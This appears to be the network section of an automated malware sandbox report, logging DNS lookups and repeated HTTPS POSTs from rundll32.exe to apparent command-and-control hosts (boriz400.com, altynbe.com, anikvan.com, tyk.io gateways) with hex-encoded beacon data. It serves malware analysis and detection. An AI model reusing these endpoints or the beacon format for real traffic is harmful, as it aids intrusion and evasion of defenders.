Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
May 11, 2024 00:04:12.655221939 CEST  192.168.2.4  1.1.1.1  0x8441  Standard query (0)  boriz400.com  A (IP address)  IN (0x0001)  false
May 11, 2024 00:04:13.858141899 CEST  192.168.2.4  1.1.1.1  0x3148  Standard query (0)  altynbe.com  A (IP address)  IN (0x0001)  false
May 11, 2024 00:04:18.686336040 CEST  192.168.2.4  1.1.1.1  0xaee4  Standard query (0)  ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io  A (IP address)  IN (0x0001)  false
May 11, 2024 00:04:19.608544111 CEST  192.168.2.4  1.1.1.1  0x69b6  Standard query (0)  anikvan.com  A (IP address)  IN (0x0001)  false
May 11, 2024 00:04:35.505889893 CEST  192.168.2.4  1.1.1.1  0x5f9f  Standard query (0)  uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io  A (IP address)  IN (0x0001)  false
May 11, 2024 00:05:43.047148943 CEST  192.168.2.4  1.1.1.1  0xc6d8  Standard query (0)  workspacin.cloud  A (IP address)  IN (0x0001)  false
May 11, 2024 00:06:00.977772951 CEST  192.168.2.4  1.1.1.1  0xc19b  Standard query (0)  uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io  A (IP address)  IN (0x0001)  false
May 11, 2024 00:06:08.749888897 CEST  192.168.2.4  1.1.1.1  0x7f64  Standard query (0)  ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io  A (IP address)  IN (0x0001)  false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 11, 2024 00:04:12.871501923 CEST | 1.1.1.1 | 192.168.2.4 | 0x8441 | No error (0) | boriz400.com | | 91.194.11.183 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:14.159241915 CEST | 1.1.1.1 | 192.168.2.4 | 0x3148 | No error (0) | altynbe.com | | 138.124.183.215 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:18.799472094 CEST | 1.1.1.1 | 192.168.2.4 | 0xaee4 | No error (0) | ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io | pub-ingress-aws-use1.cloud-ara.tyk.io | | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:04:18.799472094 CEST | 1.1.1.1 | 192.168.2.4 | 0xaee4 | No error (0) | pub-ingress-aws-use1.cloud-ara.tyk.io | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:04:18.799472094 CEST | 1.1.1.1 | 192.168.2.4 | 0xaee4 | No error (0) | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | | 54.175.181.104 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:18.799472094 CEST | 1.1.1.1 | 192.168.2.4 | 0xaee4 | No error (0) | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | | 35.172.8.165 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:18.799472094 CEST | 1.1.1.1 | 192.168.2.4 | 0xaee4 | No error (0) | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | | 54.159.36.188 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:19.711488962 CEST | 1.1.1.1 | 192.168.2.4 | 0x69b6 | No error (0) | anikvan.com | | 95.164.68.73 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:35.619683981 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f9f | No error (0) | uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | pub-ingress-aws-euc1.cloud-ara.tyk.io | | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:04:35.619683981 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f9f | No error (0) | pub-ingress-aws-euc1.cloud-ara.tyk.io | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:04:35.619683981 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f9f | No error (0) | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | | 3.69.236.35 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:35.619683981 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f9f | No error (0) | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | | 3.72.42.242 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:35.619683981 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f9f | No error (0) | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | | 35.157.36.116 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:05:43.138046026 CEST | 1.1.1.1 | 192.168.2.4 | 0xc6d8 | No error (0) | workspacin.cloud | | 104.21.16.155 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:05:43.138046026 CEST | 1.1.1.1 | 192.168.2.4 | 0xc6d8 | No error (0) | workspacin.cloud | | 172.67.213.171 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:06:01.079061031 CEST | 1.1.1.1 | 192.168.2.4 | 0xc19b | No error (0) | uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | pub-ingress-aws-euc1.cloud-ara.tyk.io | | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:06:01.079061031 CEST | 1.1.1.1 | 192.168.2.4 | 0xc19b | No error (0) | pub-ingress-aws-euc1.cloud-ara.tyk.io | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:06:01.079061031 CEST | 1.1.1.1 | 192.168.2.4 | 0xc19b | No error (0) | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | | 3.69.236.35 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:06:01.079061031 CEST | 1.1.1.1 | 192.168.2.4 | 0xc19b | No error (0) | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | | 35.157.36.116 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:06:01.079061031 CEST | 1.1.1.1 | 192.168.2.4 | 0xc19b | No error (0) | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | | 3.72.42.242 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:06:08.864455938 CEST | 1.1.1.1 | 192.168.2.4 | 0x7f64 | No error (0) | ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io | pub-ingress-aws-use1.cloud-ara.tyk.io | | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:06:08.864455938 CEST | 1.1.1.1 | 192.168.2.4 | 0x7f64 | No error (0) | pub-ingress-aws-use1.cloud-ara.tyk.io | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:06:08.864455938 CEST | 1.1.1.1 | 192.168.2.4 | 0x7f64 | No error (0) | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | | 54.175.181.104 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:06:08.864455938 CEST | 1.1.1.1 | 192.168.2.4 | 0x7f64 | No error (0) | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | | 54.159.36.188 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:06:08.864455938 CEST | 1.1.1.1 | 192.168.2.4 | 0x7f64 | No error (0) | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | | 35.172.8.165 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49745 | 91.194.11.183 | 443 | 7320 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:04:13 UTC | 246 | OUT | POST /api/azure HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Host: boriz400.com
Content-Length: 538
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-10 22:04:13 UTC | 538 | OUT | Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce686c08945940c3c1cdc8964c7fdad0cfd8601957b69a65222616fd166808a18930e6d60ae582bc30d5de4e7ce00875579520fb5950b872c2f7ba9c930ebd577371f003a80d99a6d79492cd78fa5d89cce948836c2ce22532f94f1c063226b2a9a5e22e442ae47b34cff28387131848b4
2024-05-10 22:04:13 UTC | 151 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html
Content-Length: 52
Connection: close
Date: Fri, 10 May 2024 22:04:13 GMT
2024-05-10 22:04:13 UTC | 52 | IN | Data Ascii: IDRTg88JXiA/lZe+8hUH9/W46VTuAzoHsP0AoOfYDIHiSokcM+Q=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49750 | 138.124.183.215 | 443 | 7320 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:04:14 UTC | 247 | OUT | POST /content.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Host: altynbe.com
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-10 22:04:14 UTC | 154 | OUT | Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:04:15 UTC | 159 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Fri, 10 May 2024 22:04:15 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49753 | 54.175.181.104 | 443 | 7320 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:04:19 UTC | 284 | OUT | POST /api/azure HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
Content-Length: 656
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-10 22:04:19 UTC | 656 | OUT | Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203905c9b82c9ab20a54383159f1baef150a2e5ca084caaee7bbf9f555dafd0006308282e914240843e97d00c121df24c6308e554c122ee7bf4
2024-05-10 22:04:19 UTC | 253 | IN | HTTP/1.1 200 OK
Date: Fri, 10 May 2024 22:04:19 GMT
Content-Type: text/html
Content-Length: 0
Connection: close
X-Ratelimit-Limit: 0
X-Ratelimit-Remaining: 0
X-Ratelimit-Reset: 0
Strict-Transport-Security: max-age=15724800; includeSubDomains


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49754 | Destination IP: 95.164.68.73 | Destination Port: 443 | PID: 7320 | Process: C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:04:20 UTC | 245 | OUT | POST /api/azure HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: anikvan.com
    Content-Length: 444
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:04:20 UTC | 444 | OUT | Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203919efb8679ab30a54392159f1baef110a2a4ca0fccaacc1bbfdd356c7fd027a4cfbb4fa64570e32f95e29c210d522b634956b4c345ce1905
2024-05-10 22:04:20 UTC | 150 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Content-Type: text/html
    Content-Length: 0
    Connection: close
    Date: Fri, 10 May 2024 22:04:20 GMT


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49755 | Destination IP: 95.164.68.73 | Destination Port: 443 | PID: 7320 | Process: C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:04:26 UTC | 247 | OUT | POST /content.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: anikvan.com
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:04:26 UTC | 154 | OUT | Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:04:26 UTC | 150 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Content-Type: text/html
    Content-Length: 0
    Connection: close
    Date: Fri, 10 May 2024 22:04:26 GMT


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49756 | Destination IP: 54.175.181.104 | Destination Port: 443 | PID: 7320 | Process: C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:04:29 UTC | 286 | OUT | POST /content.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:04:29 UTC | 154 | OUT | Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:04:29 UTC | 206 | IN | HTTP/1.1 404 Not Found
    Date: Fri, 10 May 2024 22:04:29 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 9
    Connection: close
    Strict-Transport-Security: max-age=15724800; includeSubDomains
2024-05-10 22:04:29 UTC | 9 | IN | Data Raw: 4e 6f 74 20 46 6f 75 6e 64
    Data Ascii: Not Found


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49757 | Destination IP: 138.124.183.215 | Destination Port: 443 | PID: 7320 | Process: C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:04:31 UTC | 245 | OUT | POST /api/azure HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: altynbe.com
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:04:31 UTC | 154 | OUT | Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:04:32 UTC | 150 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Content-Type: text/html
    Content-Length: 0
    Connection: close
    Date: Fri, 10 May 2024 22:04:32 GMT


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49758 | Destination IP: 3.69.236.35 | Destination Port: 443 | PID: 7320 | Process: C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:04:35 UTC | 279 | OUT | POST /api/azure HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:04:35 UTC | 154 | OUT | Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:04:36 UTC | 253 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 May 2024 22:04:36 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: close
    X-Ratelimit-Limit: 0
    X-Ratelimit-Remaining: 0
    X-Ratelimit-Reset: 0
    Strict-Transport-Security: max-age=15724800; includeSubDomains


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49759 | Destination IP: 95.164.68.73 | Destination Port: 443 | PID: 7320 | Process: C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:04:42 UTC | 247 | OUT | POST /content.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: anikvan.com
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:04:42 UTC | 154 | OUT | Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:04:42 UTC | 150 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Content-Type: text/html
    Content-Length: 0
    Connection: close
    Date: Fri, 10 May 2024 22:04:42 GMT


Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49760 | Destination IP: 3.69.236.35 | Destination Port: 443 | PID: 7320 | Process: C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:04:47 UTC | 279 | OUT | POST /api/azure HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:04:47 UTC | 154 | OUT | Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:04:48 UTC | 253 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 May 2024 22:04:48 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: close
    X-Ratelimit-Limit: 0
    X-Ratelimit-Remaining: 0
    X-Ratelimit-Reset: 0
    Strict-Transport-Security: max-age=15724800; includeSubDomains


Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49761 | Destination IP: 3.69.236.35 | Destination Port: 443 | PID: 7320 | Process: C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:04:50 UTC | 279 | OUT | POST /api/azure HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:04:50 UTC | 154 | OUT | Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:04:50 UTC | 253 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 May 2024 22:04:50 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: close
    X-Ratelimit-Limit: 0
    X-Ratelimit-Remaining: 0
    X-Ratelimit-Reset: 0
    Strict-Transport-Security: max-age=15724800; includeSubDomains


Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49762 | Destination IP: 54.175.181.104 | Destination Port: 443 | PID: 7320 | Process: C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:04:54 UTC | 286 | OUT | POST /content.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:04:54 UTC | 154 | OUT | Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:04:54 UTC | 206 | IN | HTTP/1.1 404 Not Found
    Date: Fri, 10 May 2024 22:04:54 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 9
    Connection: close
    Strict-Transport-Security: max-age=15724800; includeSubDomains
2024-05-10 22:04:54 UTC | 9 | IN | Data Raw: 4e 6f 74 20 46 6f 75 6e 64
    Data Ascii: Not Found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49764 | 95.164.68.73 | 443 | 7320 | C:\Windows\System32\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:05:00 UTC | 247 | OUT | POST /content.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: anikvan.com
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:05:00 UTC | 154 | OUT | Data Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:05:00 UTC | 150 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Content-Type: text/html
    Content-Length: 0
    Connection: close
    Date: Fri, 10 May 2024 22:05:00 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49765 | 3.69.236.35 | 443 | 7320 | C:\Windows\System32\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:05:03 UTC | 281 | OUT | POST /content.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:05:03 UTC | 154 | OUT | Data Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:05:03 UTC | 206 | IN | HTTP/1.1 404 Not Found
    Date: Fri, 10 May 2024 22:05:03 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 9
    Connection: close
    Strict-Transport-Security: max-age=15724800; includeSubDomains
2024-05-10 22:05:03 UTC | 9 | IN | Data Raw: 4e 6f 74 20 46 6f 75 6e 64
    Data Ascii: Not Found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49766 | 91.194.11.183 | 443 | 7320 | C:\Windows\System32\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:05:09 UTC | 248 | OUT | POST /content.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: boriz400.com
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:05:09 UTC | 154 | OUT | Data Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:05:10 UTC | 150 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Content-Type: text/html
    Content-Length: 0
    Connection: close
    Date: Fri, 10 May 2024 22:05:09 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49767 | 3.69.236.35 | 443 | 7320 | C:\Windows\System32\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:05:11 UTC | 279 | OUT | POST /api/azure HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:05:11 UTC | 154 | OUT | Data Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:05:12 UTC | 253 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 May 2024 22:05:11 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: close
    X-Ratelimit-Limit: 0
    X-Ratelimit-Remaining: 0
    X-Ratelimit-Reset: 0
    Strict-Transport-Security: max-age=15724800; includeSubDomains


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49768 | 95.164.68.73 | 443 | 7320 | C:\Windows\System32\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:05:13 UTC | 247 | OUT | POST /content.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: anikvan.com
    Content-Length: 154
